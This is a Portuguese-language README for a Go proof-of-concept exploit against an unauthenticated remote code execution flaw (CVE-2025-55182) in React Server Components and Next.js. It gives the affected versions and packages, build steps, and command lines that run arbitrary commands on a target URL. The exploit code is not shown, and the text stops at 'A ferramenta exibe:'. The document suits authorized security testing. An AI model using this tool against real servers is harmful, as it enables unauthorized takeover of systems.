
Código de exploração para a vulnerabilidade React2Shell RCE (CVE-2025-55182) que afeta React Server Components 19.0.0-19.2.0. Explora desserialização insegura para execução remota de código não autenticada.
Prova de Conceito (PoC) para vulnerabilidade de Execução Remota de Código nos React Server Components (RSC) / Next.js.
Existe uma vulnerabilidade de execução remota de código sem autenticação nos React Server Components versões 19.0.0, 19.1.0, 19.1.1 e 19.2.0, incluindo os seguintes pacotes: react-server-dom-parcel, react-server-dom-turbopack e react-server-dom-webpack. O código vulnerável desserializa de forma insegura cargas (payloads) de requisições HTTP para endpoints de Server Function.
⚠️ AVISO: Esta ferramenta é apenas para testes de segurança autorizados.
go build -o exploit exploit.go
Ou execute diretamente:
go run exploit.go
./exploit -u <URL> -c <command>
-u - URL alvo (obrigatório)-c - Comando a executar (padrão: id)# Basic usage
./exploit -u https://vulnerable -c "whoami"
# Execute different command
./exploit -u https://vulnerable -c "ls -la"
# Run directly with go
go run exploit.go -u https://vulnerable -c "pwd"

A ferramenta exibe: